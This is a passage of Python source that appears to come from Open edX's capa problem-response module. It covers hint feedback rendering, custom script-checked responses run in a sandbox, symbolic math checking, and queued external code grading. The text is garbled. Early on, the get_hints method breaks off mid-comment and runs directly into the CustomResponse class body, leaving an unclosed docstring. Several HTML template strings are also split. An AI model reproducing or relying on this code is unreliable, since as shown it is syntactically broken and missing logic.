triggered\n e.g. [{'text': 'feedback 1', 'trigger': [{'choice': 'choice_0', 'selected': True}]},...\n Case 2: a compound hint, the trigger list has 1 or more choices\n e.g. [{'text': 'a hint', 'trigger':[{'choice': 'choice_0', 'selected': True},\n {'choice': 'choice_1', 'selected':True}]}]\n \"\"\"\n _ = self.capa_system.i18n.gettext\n # 1. Establish the hint_texts\n # This can lead to early-exit if the hint is blank.\n if not hint_log:\n # .text can be None when node has immediate children nodes\n if hint_node is None or (hint_node.text is None and len(hint_node.getchildren()) == 0):\n return ''\n hint_text = get_inner_html_from_xpath(hint_node)\n if not hint_text:\n return ''\n hint_log = [{'text': hint_text}]\n # invariant: xxxx\n\n # 2. 
Establish the label:\n # Passed in, or from the node, or the default\n if not label and hint_node is not None:\n label = hint_node.get('label', None)\n # Tricky: label None means output defaults, while '' means output empty label\n if label is None:\n if correct:\n label = _('Correct:')\n else:\n label = _('Incorrect:')\n\n # This is the \"feedback hint\" event\n event_info = {}\n event_info['module_id'] = str(self.capa_block.location)\n event_info['problem_part_id'] = self.id\n event_info['trigger_type'] = 'single' # may be overwritten by log_extra\n event_info['hint_label'] = label\n event_info['hints'] = hint_log\n event_info['correctness'] = correct\n event_info['student_answer'] = student_answer\n event_info['question_type'] = question_tag\n if log_extra:\n event_info.update(log_extra)\n self.capa_block.runtime.publish(self.capa_block, 'edx.problem.hint.feedback_displayed', event_info)\n\n # Form the div-wrapped hint texts\n hints_wrap = HTML('').join(\n [HTML('
<div class=\"{question_hint_text_style}\">{hint_content}</div>
    ').format(\n question_hint_text_style=QUESTION_HINT_TEXT_STYLE,\n hint_content=HTML(dct.get('text'))\n ) for dct in hint_log]\n )\n if multiline_mode:\n hints_wrap = HTML('
<div class=\"{question_hint_multiline}\">{hints_wrap}</div>
').format(\n question_hint_multiline=QUESTION_HINT_MULTILINE,\n hints_wrap=hints_wrap\n )\n label_wrap = ''\n if label:\n label_wrap = HTML('<span class=\"{question_hint_label_style}\">{label} </span>').format(\n question_hint_label_style=QUESTION_HINT_LABEL_STYLE,\n label=Text(label)\n )\n\n # Establish the outer style\n if correct:\n style = QUESTION_HINT_CORRECT_STYLE\n else:\n style = QUESTION_HINT_INCORRECT_STYLE\n\n # Ready to go\n return HTML('
<div class=\"{st}\"><div class=\"explanation-title\">{text}</div>
{lwrp}{hintswrap}</div>
').format(\n st=style,\n text=Text(_(\"Answer\")),\n lwrp=label_wrap,\n hintswrap=hints_wrap\n )\n\n def get_extended_hints(self, student_answers, new_cmap):\n \"\"\"\n Pull \"extended hint\" information out the xml based on the student answers,\n installing it in the new_map for display.\n Implemented by subclasses that have extended hints.\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n def get_hints(self, student_answers, new_cmap, old_cmap):\n \"\"\"\n Generate adaptive hints for this problem based on student answers, the old CorrectMap,\n and the new CorrectMap produced by get_score.\n\n Does not return anything.\n\n Modifies new_cmap, by adding hints to answer_id entries as appropriate.\n \"\"\"\n\n hintfn = None\n hint_function_provided = False\n hintgroup = self.xml.find('hintgroup')\n if hintgroup is not None:\n hintfn = hintgroup.get('hintfn')\n if hintfn is not None:\n hint_function_provided = True\n\n if hint_function_provided:\n # if a hint function has been supplied, it will take precedence\n # Hint is determined by a function defined in the <script>\n \"\"\"\n\n human_name = _('Custom Evaluated Script')\n tags = ['customresponse']\n\n allowed_inputfields = ['textline', 'textbox', 'crystallography',\n 'chemicalequationinput', 'vsepr_input',\n 'drag_and_drop_input', 'designprotein2dinput',\n 'editageneinput', 'annotationinput',\n 'jsinput', 'formulaequationinput']\n code = None\n expect = None\n\n # Standard amount for partial credit if not otherwise specified:\n default_pc = 0.5\n\n def setup_response(self):\n xml = self.xml\n\n # if <customresponse> has an \"expect\" (or \"answer\") attribute then save\n # that\n self.expect = contextualize_text(xml.get('expect') or xml.get('answer'), self.context)\n\n log.debug('answer_ids=%s', self.answer_ids)\n\n # the <answer>...</answer> stanza should be local to the current <customresponse>.\n # So try looking there first.\n self.code = None\n answer = None\n try:\n answer = xml.xpath('//*[@id=$id]//answer', id=xml.get('id'))[0]\n except IndexError:\n # print \"xml = \",etree.tostring(xml,pretty_print=True)\n\n # if we have a \"cfn\" attribute then look for the function specified by cfn, in\n # the problem context ie the comparison function is defined in the\n # <script>...</script> stanza instead\n cfn = xml.get('cfn')\n if cfn:\n log.debug(\"cfn = %s\", cfn)\n\n # This is a bit twisty. We used to grab the cfn function from\n # the context, but now that we sandbox Python execution, we\n # can't get functions from previous executions. So we make an\n # actual function that will re-execute the original script,\n # and invoke the function with the data needed.\n def make_check_function(script_code, cfn):\n def check_function(expect, ans, **kwargs):\n extra_args = \"\".join(\", {0}={0}\".format(k) for k in kwargs)\n code = (\n script_code + \"\\n\" +\n \"cfn_return = %s(expect, ans%s)\\n\" % (cfn, extra_args)\n )\n globals_dict = {\n 'expect': expect,\n 'ans': ans,\n }\n globals_dict.update(kwargs)\n safe_exec.safe_exec(\n code,\n globals_dict,\n python_path=self.context['python_path'],\n extra_files=self.context['extra_files'],\n slug=self.id,\n random_seed=self.context['seed'],\n unsafely=self.capa_system.can_execute_unsafe_code(),\n )\n return globals_dict['cfn_return']\n return check_function\n\n self.code = make_check_function(self.context['script_code'], cfn)\n\n
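# Illustration (hypothetical course-authored cfn, not part of this module):\n # a <script type=\"loncapa/python\"> block in the problem might define\n # def check_func(expect, ans):\n # return {'ok': ans.strip() == expect, 'msg': 'Checked.'}\n # make_check_function() then re-runs that script in the sandbox and\n # evaluates cfn_return = check_func(expect, ans) on each grading call.\n\n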
if not self.code:\n if answer is None:\n log.error(\"[courseware.capa.responsetypes.customresponse] missing\"\n \" code checking script! id=%s\", self.id)\n self.code = ''\n else:\n answer_src = answer.get('src')\n if answer_src is not None:\n # TODO: this code seems not to be used any more since self.capa_system.filesystem doesn't exist.\n self.code = self.capa_system.filesystem.open('src/' + answer_src).read()\n else:\n self.code = answer.text\n\n def get_score(self, student_answers):\n \"\"\"\n student_answers is a dict with everything from request.POST, but with the first part\n of each key removed (the string before the first \"_\").\n \"\"\"\n _ = self.capa_system.i18n.gettext\n\n log.debug('%s: student_answers=%s', str(self), student_answers)\n\n # ordered list of answer id's\n # sort the responses on the basis of the problem's position number\n # which can be found in the last place in the problem id. Then convert\n # this number into an int, so that we sort on ints instead of strings\n idset = sorted(self.answer_ids, key=lambda x: int(x.split(\"_\")[-1]))\n try:\n # ordered list of answers\n submission = [student_answers[k] for k in idset]\n except Exception as err:\n msg = \"[courseware.capa.responsetypes.customresponse] {message}\\n idset = {idset}, error = {err}\".format(\n message=_(\"error getting student answer from {student_answers}\").format(\n student_answers=student_answers,\n ),\n idset=idset,\n err=err\n )\n\n log.error(\n \"[courseware.capa.responsetypes.customresponse] error getting\"\n \" student answer from %s\"\n \"\\n idset = %s, error = %s\",\n student_answers, idset, err\n )\n raise Exception(msg) # lint-amnesty, pylint: disable=raise-missing-from\n\n # global variable in context which holds the Presentation MathML from dynamic math input\n # ordered list of dynamath responses\n dynamath = [student_answers.get(k + '_dynamath', None) for k in idset]\n\n # if there is only one box, and it's empty, then don't evaluate\n if len(idset) == 1 and not submission[0]:\n # default to no error message on empty answer (to be consistent with other\n # responsetypes) but allow author to still have the old behavior by setting\n # empty_answer_err attribute\n msg = (HTML('<span class=\"inline-error\">{0}</span>').format(_('No answer entered!'))\n if self.xml.get('empty_answer_err') else '')\n return CorrectMap(idset[0], 'incorrect', msg=msg)\n\n # NOTE: correct = 'unknown' could be dangerous. 
Inputtypes such as textline are\n # not expecting 'unknown's\n correct = ['unknown'] * len(idset)\n messages = [''] * len(idset)\n overall_message = \"\"\n\n # put these in the context of the check function evaluator\n # note that this doesn't help the \"cfn\" version - only the exec version\n self.context.update({\n # my ID\n 'response_id': self.id,\n\n # expected answer (if given as attribute)\n 'expect': self.expect,\n\n # ordered list of student answers from entry boxes in our subtree\n 'submission': submission,\n\n # ordered list of ID's of all entry boxes in our subtree\n 'idset': idset,\n\n # ordered list of all javascript inputs in our subtree\n 'dynamath': dynamath,\n\n # dict of student's responses, with keys being entry box IDs\n 'answers': student_answers,\n\n # the list to be filled in by the check function\n 'correct': correct,\n\n # the list of messages to be filled in by the check function\n 'messages': messages,\n\n # a message that applies to the entire response\n # instead of a particular input\n 'overall_message': overall_message,\n\n # any options to be passed to the cfn\n 'options': self.xml.get('options'),\n 'testdat': 'hello world',\n })\n\n # Pass DEBUG to the check function.\n self.context['debug'] = self.capa_system.DEBUG\n\n # Run the check function\n self.execute_check_function(idset, submission)\n\n # build map giving \"correct\"ness of the answer(s)\n correct = self.context['correct']\n messages = self.context['messages']\n overall_message = self.clean_message_html(self.context['overall_message'])\n grade_decimals = self.context.get('grade_decimals')\n\n correct_map = CorrectMap()\n correct_map.set_overall_message(overall_message)\n\n for k in range(len(idset)): # lint-amnesty, pylint: disable=consider-using-enumerate\n max_points = self.maxpoints[idset[k]]\n if grade_decimals:\n npoints = max_points * grade_decimals[k]\n else:\n if correct[k] == 'correct':\n npoints = max_points\n elif correct[k] == 'partially-correct':\n npoints = max_points * self.default_pc\n else:\n npoints = 0\n correct_map.set(idset[k], correct[k], msg=messages[k],\n npoints=npoints)\n return correct_map\n\n def execute_check_function(self, idset, submission): # lint-amnesty, pylint: disable=missing-function-docstring, too-many-statements\n # exec the check function\n if isinstance(self.code, str): # lint-amnesty, pylint: disable=too-many-nested-blocks\n try:\n safe_exec.safe_exec(\n self.code,\n self.context,\n cache=self.capa_system.cache,\n python_path=self.context['python_path'],\n extra_files=self.context['extra_files'],\n slug=self.id,\n random_seed=self.context['seed'],\n unsafely=self.capa_system.can_execute_unsafe_code(),\n )\n except Exception as err: # pylint: disable=broad-except\n self._handle_exec_exception(err)\n\n else:\n # self.code is not a string; it's a function we created earlier.\n\n # this is an interface to the Tutor2 check functions\n tutor_cfn = self.code\n answer_given = submission[0] if (len(idset) == 1) else submission\n kwnames = self.xml.get(\"cfn_extra_args\", \"\").split()\n kwargs = {n: self.context.get(n) for n in kwnames}\n log.debug(\" submission = %s\", submission)\n try:\n ret = tutor_cfn(self.expect, answer_given, **kwargs)\n except Exception as err: # pylint: disable=broad-except\n self._handle_exec_exception(err)\n log.debug(\n \"[courseware.capa.responsetypes.customresponse.get_score] ret = %s\",\n ret\n )\n if isinstance(ret, dict):\n # One kind of dictionary the check function can return has the\n # form {'ok': BOOLEAN or STRING, 'msg': 
STRING, 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)}\n # 'ok' will control the checkmark, while grade_decimal, if present, will scale\n # the score the student receives on the response.\n # If there are multiple inputs, they all get marked\n # to the same correct/incorrect value\n if 'ok' in ret:\n\n # Returning any falsy value or the \"false\" string for \"ok\" gives incorrect.\n # Returning any string that includes \"partial\" for \"ok\" gives partial credit.\n # Returning any other truthy value for \"ok\" gives correct\n\n ok_val = str(ret['ok']).lower().strip() if bool(ret['ok']) else 'false'\n\n if ok_val == 'false':\n correct = 'incorrect'\n elif 'partial' in ok_val:\n correct = 'partially-correct'\n else:\n correct = 'correct'\n correct = [correct] * len(idset) # All inputs share the same mark.\n\n # old version, no partial credit:\n # correct = ['correct' if ret['ok'] else 'incorrect'] * len(idset)\n\n msg = ret.get('msg', None)\n msg = self.clean_message_html(msg)\n\n # If there is only one input, apply the message to that input\n # Otherwise, apply the message to the whole problem\n if len(idset) > 1:\n self.context['overall_message'] = msg\n else:\n self.context['messages'][0] = msg\n\n if 'grade_decimal' in ret:\n decimal = float(ret['grade_decimal'])\n else:\n if correct[0] == 'correct':\n decimal = 1.0\n elif correct[0] == 'partially-correct':\n decimal = self.default_pc\n else:\n decimal = 0.0\n grade_decimals = [decimal] * len(idset)\n self.context['grade_decimals'] = grade_decimals\n\n # Another kind of dictionary the check function can return has\n # the form:\n # { 'overall_message': STRING,\n # 'input_list': [\n # {\n # 'ok': BOOLEAN or STRING,\n # 'msg': STRING,\n # 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)\n # },\n # ...\n # ]\n # }\n # 'ok' will control the checkmark, while grade_decimal, if present, will scale\n # the score the student receives on the response.\n #\n # This allows the function to return an 'overall message'\n # that applies to the entire problem, as well as correct/incorrect\n # status, scaled grades, and messages for individual inputs\n elif 'input_list' in ret:\n overall_message = ret.get('overall_message', '')\n input_list = ret['input_list']\n\n correct = []\n messages = []\n grade_decimals = []\n\n # Returning any falsy value or the \"false\" string for \"ok\" gives incorrect.\n # Returning any string that includes \"partial\" for \"ok\" gives partial credit.\n # Returning any other truthy value for \"ok\" gives correct\n\n for input_dict in input_list:\n if str(input_dict['ok']).lower().strip() == \"false\" or not input_dict['ok']:\n correct.append('incorrect')\n elif 'partial' in str(input_dict['ok']).lower().strip():\n correct.append('partially-correct')\n else:\n correct.append('correct')\n\n # old version, no partial credit\n # correct.append('correct'\n # if input_dict['ok'] else 'incorrect')\n\n msg = (self.clean_message_html(input_dict['msg'])\n if 'msg' in input_dict else None)\n messages.append(msg)\n if 'grade_decimal' in input_dict:\n decimal = input_dict['grade_decimal']\n else:\n if str(input_dict['ok']).lower().strip() == 'true':\n decimal = 1.0\n elif 'partial' in str(input_dict['ok']).lower().strip():\n decimal = self.default_pc\n else:\n decimal = 0.0\n grade_decimals.append(decimal)\n\n self.context['messages'] = messages\n self.context['overall_message'] = overall_message\n self.context['grade_decimals'] = grade_decimals\n\n # Otherwise, we do not recognize the dictionary\n # Raise an exception\n 
else:\n log.error(traceback.format_exc())\n _ = self.capa_system.i18n.gettext\n raise ResponseError(\n _(\"CustomResponse: check function returned an invalid dictionary!\")\n )\n\n else:\n\n # Returning any falsy value or the \"false\" string for \"ok\" gives incorrect.\n # Returning any string that includes \"partial\" for \"ok\" gives partial credit.\n # Returning any other truthy value for \"ok\" gives correct\n\n if str(ret).lower().strip() == \"false\" or not bool(ret):\n correct = 'incorrect'\n elif 'partial' in str(ret).lower().strip():\n correct = 'partially-correct'\n else:\n correct = 'correct'\n correct = [correct] * len(idset)\n\n # old version, no partial credit:\n # correct = ['correct' if ret else 'incorrect'] * len(idset)\n\n self.context['correct'] = correct\n\n def clean_message_html(self, msg): # lint-amnesty, pylint: disable=missing-function-docstring\n\n # If *msg* is an empty string, then the code below\n # will return \"\". To avoid this, we first check\n # that *msg* is a non-empty string.\n if msg:\n\n # When we parse *msg* using etree, there needs to be a root\n # element, so we wrap the *msg* text in <html> tags\n msg = HTML('<html>{msg}</html>').format(msg=HTML(msg))\n\n # Replace < characters\n msg = msg.replace('&#60;', '&lt;')\n\n # Use etree to prettify the HTML\n msg = etree.tostring(fromstring_bs(msg), pretty_print=True).decode('utf-8')\n\n msg = msg.replace('&#13;', '')\n\n # Remove the <html> tags we introduced earlier, so we're\n # left with just the prettified message markup\n msg = re.sub('(?ms)<html>(.*)</html>', '\\\\1', msg)\n\n # Strip leading and trailing whitespace\n return msg.strip()\n\n # If we start with an empty string, then return an empty string\n else:\n return \"\"\n\n def get_answers(self):\n \"\"\"\n Give correct answer expected for this response.\n\n use default_answer_map from entry elements (eg textline),\n when this response has multiple entry objects.\n\n but for simplicity, if an \"expect\" attribute was given by the content author\n ie <customresponse expect=\"foo\" ...> then that.\n \"\"\"\n if len(self.answer_ids) > 1:\n return self.default_answer_map\n if self.expect:\n return {self.answer_ids[0]: self.expect}\n return self.default_answer_map\n\n def _handle_exec_exception(self, err):\n \"\"\"\n Handle an exception raised during the execution of\n custom Python code.\n\n Raises a ResponseError\n \"\"\"\n\n # Log the error if we are debugging\n msg = 'Error occurred while evaluating CustomResponse'\n log.warning(msg, exc_info=True)\n\n # Notify student with a student input error\n _, _, traceback_obj = sys.exc_info()\n raise ResponseError(str(err), traceback_obj)\n\n#-----------------------------------------------------------------------------\n\n\n@registry.register\nclass SymbolicResponse(CustomResponse):\n \"\"\"\n Symbolic math response checking, using symmath library.\n \"\"\"\n\n human_name = _('Symbolic Math Input')\n tags = ['symbolicresponse']\n max_inputfields = 1\n\n def setup_response(self):\n # Symbolic response always uses symmath_check()\n # If the XML did not specify this, then set it now\n # Otherwise, we get an error from the superclass\n self.xml.set('cfn', 'symmath_check')\n\n # Let CustomResponse do its setup\n super(SymbolicResponse, self).setup_response() # lint-amnesty, pylint: disable=super-with-arguments\n\n def execute_check_function(self, idset, submission):\n from symmath import symmath_check\n try:\n # Since we have limited max_inputfields to 1,\n # we can assume that there is only one submission\n answer_given = submission[0]\n\n ret = symmath_check(\n self.expect, answer_given,\n
dynamath=self.context.get('dynamath'),\n options=self.context.get('options'),\n debug=self.context.get('debug'),\n )\n except Exception as err:\n log.error(\"oops in SymbolicResponse (cfn) error %s\", err)\n log.error(traceback.format_exc())\n _ = self.capa_system.i18n.gettext\n # Translators: 'SymbolicResponse' is a problem type and should not be translated.\n msg = _(\"An error occurred with SymbolicResponse. The error was: {error_msg}\").format(\n error_msg=err,\n )\n raise Exception(msg) # lint-amnesty, pylint: disable=raise-missing-from\n self.context['messages'][0] = self.clean_message_html(ret['msg'])\n self.context['correct'] = ['correct' if ret['ok'] else 'incorrect'] * len(idset)\n\n#-----------------------------------------------------------------------------\n\n## ScoreMessage named tuple ##\n## valid: Flag indicating valid score_msg format (Boolean)\n## correct: Correctness of submission (Boolean)\n## score: Points to be assigned (numeric, can be float)\n## msg: Message from grader to display to student (string)\n\nScoreMessage = namedtuple('ScoreMessage', ['valid', 'correct', 'points', 'msg'])\n\n\n@registry.register\nclass CodeResponse(LoncapaResponse):\n \"\"\"\n Grade student code using an external queueing server, called 'xqueue'.\n\n Expects 'xqueue' dict in LoncapaSystem with the following properties that are\n needed by CodeResponse::\n\n capa_system.xqueue = object with properties:\n interface: XQueueInterface object.\n construct_callback: Per-StudentModule callback URL constructor,\n defaults to using 'score_update' as the correct dispatch (function).\n default_queuename: Default queue name to submit request (string).\n }\n\n External requests are only submitted for student submission grading, not\n for getting reference answers.\n\n \"\"\"\n\n human_name = _('Code Input')\n tags = ['coderesponse']\n allowed_inputfields = ['textbox', 'filesubmission', 'matlabinput']\n max_inputfields = 1\n payload = None\n initial_display = None\n url = None\n answer = None\n queue_name = None\n\n def setup_response(self):\n \"\"\"\n Configure CodeResponse from XML. Supports both CodeResponse and ExternalResponse XML\n\n TODO: Determines whether in synchronous or asynchronous (queued) mode\n \"\"\"\n xml = self.xml\n # TODO: XML can override external resource (grader/queue) URL\n self.url = xml.get('url', None)\n\n # We do not support xqueue within Studio.\n if self.capa_system.xqueue is not None:\n default_queuename = self.capa_system.xqueue.default_queuename\n else:\n default_queuename = None\n self.queue_name = xml.get('queuename', default_queuename)\n\n # VS[compat]:\n # Check if XML uses the ExternalResponse format or the generic\n # CodeResponse format\n codeparam = self.xml.find('codeparam')\n assert codeparam is not None, \"Unsupported old format! without \"\n self._parse_coderesponse_xml(codeparam)\n\n def _parse_coderesponse_xml(self, codeparam):\n \"\"\"\n Parse the new CodeResponse XML format. When successful, sets:\n self.initial_display\n self.answer (an answer to display to the student in the LMS)\n self.payload\n \"\"\"\n grader_payload = codeparam.find('grader_payload')\n grader_payload = grader_payload.text if grader_payload is not None else ''\n self.payload = {\n 'grader_payload': grader_payload,\n }\n\n # matlab api key can be defined in course settings. 
if so, add it to the grader payload\n api_key = getattr(self.capa_system, 'matlab_api_key', None)\n if api_key and self.xml.find('matlabinput') is not None:\n self.payload['token'] = api_key\n self.payload['endpoint_version'] = \"2\"\n self.payload['requestor_id'] = self.capa_system.anonymous_student_id\n\n self.initial_display = find_with_default(\n codeparam, 'initial_display', '')\n _ = self.capa_system.i18n.gettext\n self.answer = find_with_default(codeparam, 'answer_display',\n _('No answer provided.'))\n\n def get_score(self, student_answers):\n _ = self.capa_system.i18n.gettext\n try:\n # Note that submission can be a file\n submission = student_answers[self.answer_id]\n except Exception as err:\n log.error(\n 'Error in CodeResponse %s: cannot get student answer for %s;'\n ' student_answers=%s',\n err, self.answer_id, convert_files_to_filenames(student_answers)\n )\n raise Exception(err) # lint-amnesty, pylint: disable=raise-missing-from\n\n # We do not support xqueue within Studio.\n if self.capa_system.xqueue is None:\n cmap = CorrectMap()\n cmap.set(self.answer_id, queuestate=None,\n msg=_('Error: No grader has been set up for this problem.'))\n return cmap\n\n # Prepare xqueue request\n #------------------------------------------------------------\n\n qinterface = self.capa_system.xqueue.interface\n qtime = datetime.strftime(datetime.now(UTC), xqueue_interface.dateformat)\n\n anonymous_student_id = self.capa_system.anonymous_student_id\n\n # Generate header\n queuekey = xqueue_interface.make_hashkey(\n str(self.capa_system.seed) + qtime + anonymous_student_id + self.answer_id\n )\n callback_url = self.capa_system.xqueue.construct_callback()\n xheader = xqueue_interface.make_xheader(\n lms_callback_url=callback_url,\n lms_key=queuekey,\n queue_name=self.queue_name\n )\n\n # Generate body\n if is_list_of_files(submission):\n # TODO: Get S3 pointer from the Queue\n self.context.update({'submission': ''})\n else:\n self.context.update({'submission': submission})\n\n contents = self.payload.copy()\n\n # Metadata related to the student submission revealed to the external\n # grader\n student_info = {\n 'anonymous_student_id': anonymous_student_id,\n 'submission_time': qtime,\n 'random_seed': self.context['seed'],\n }\n contents.update({'student_info': json.dumps(student_info)})\n\n # Submit request. 
When successful, 'msg' is the prior length of the\n # queue\n\n if is_list_of_files(submission):\n # TODO: Is there any information we want to send here?\n contents.update({'student_response': ''})\n (error, msg) = qinterface.send_to_queue(header=xheader,\n body=json.dumps(contents),\n files_to_upload=submission)\n else:\n contents.update({'student_response': submission})\n (error, msg) = qinterface.send_to_queue(header=xheader,\n body=json.dumps(contents))\n\n # State associated with the queueing request\n queuestate = {'key': queuekey,\n 'time': qtime, }\n\n cmap = CorrectMap()\n if error:\n _ = self.capa_system.i18n.gettext\n error_msg = _('Unable to deliver your submission to grader (Reason: {error_msg}).'\n ' Please try again later.').format(error_msg=msg)\n cmap.set(self.answer_id, queuestate=None, msg=error_msg)\n else:\n # Queueing mechanism flags:\n # 1) Backend: Non-null CorrectMap['queuestate'] indicates that\n # the problem has been queued\n # 2) Frontend: correctness='incomplete' eventually trickles down\n # through inputtypes.textbox and .filesubmission to inform the\n # browser to poll the LMS\n cmap.set(self.answer_id, queuestate=queuestate,\n correctness='incomplete', msg=msg)\n\n return cmap\n\n def update_score(self, score_msg, oldcmap, queuekey):\n \"\"\"Updates the user's score based on the returned message from the grader.\"\"\"\n (valid_score_msg, correct, points, msg) = self._parse_score_msg(score_msg)\n\n _ = self.capa_system.i18n.gettext\n\n if not valid_score_msg:\n # Translators: 'grader' refers to the edX automatic code grader.\n error_msg = _('Invalid grader reply. Please contact the course staff.')\n oldcmap.set(self.answer_id, msg=error_msg)\n return oldcmap\n\n correctness = 'correct' if correct else 'incorrect'\n\n # TODO: Find out how this is used elsewhere, if any\n self.context['correct'] = correctness\n\n # Replace 'oldcmap' with new grading results if queuekey matches. If queuekey\n # does not match, we keep waiting for the score_msg whose key actually\n # matches\n if oldcmap.is_right_queuekey(self.answer_id, queuekey):\n # Sanity check on returned points\n if points < 0: # lint-amnesty, pylint: disable=consider-using-max-builtin\n points = 0\n # Queuestate is consumed\n oldcmap.set(\n self.answer_id, npoints=points, correctness=correctness,\n msg=msg.replace('&nbsp;', '&#160;'), queuestate=None)\n else:\n log.debug(\n 'CodeResponse: queuekey %s does not match for answer_id=%s.',\n queuekey,\n self.answer_id\n )\n\n return oldcmap\n\n
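# For reference (format documented in _parse_score_msg below), a valid\n # grader reply is a JSON-serialized dict; illustrative values only:\n # {\"correct\": true, \"score\": 0.9, \"msg\": \"<p>Good job</p>\"}\n\n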
def get_answers(self):\n anshtml = HTML('<span class=\"code-answer\"><br/><pre>{}</pre></span>
    ').format(self.answer)\n return {self.answer_id: anshtml}\n\n def get_initial_display(self):\n \"\"\"\n The course author can specify an initial display\n to be displayed the code response box.\n \"\"\"\n return {self.answer_id: self.initial_display}\n\n def _parse_score_msg(self, score_msg):\n \"\"\"\n Grader reply is a JSON-dump of the following dict\n { 'correct': True/False,\n 'score': Numeric value (floating point is okay) to assign to answer\n 'msg': grader_msg }\n\n Returns (valid_score_msg, correct, score, msg):\n valid_score_msg: Flag indicating valid score_msg format (Boolean)\n correct: Correctness of submission (Boolean)\n score: Points to be assigned (numeric, can be float)\n msg: Message from grader to display to student (string)\n \"\"\"\n fail = (False, False, 0, '')\n try:\n score_result = json.loads(score_msg)\n except (TypeError, ValueError):\n log.error(\"External grader message should be a JSON-serialized dict.\"\n \" Received score_msg = %s\", score_msg)\n return fail\n if not isinstance(score_result, dict):\n log.error(\"External grader message should be a JSON-serialized dict.\"\n \" Received score_result = %s\", score_result)\n return fail\n for tag in ['correct', 'score', 'msg']:\n if tag not in score_result:\n log.error(\"External grader message is missing one or more required\"\n \" tags: 'correct', 'score', 'msg'\")\n return fail\n\n # Next, we need to check that the contents of the external grader message is safe for the LMS.\n # 1) Make sure that the message is valid XML (proper opening/closing tags)\n # 2) If it is not valid XML, make sure it is valid HTML.\n # Note: html5lib parser will try to repair any broken HTML\n # For example: will become .\n msg = score_result['msg']\n\n try:\n etree.fromstring(msg)\n except etree.XMLSyntaxError as _err:\n # If `html` contains attrs with no values, like `controls` in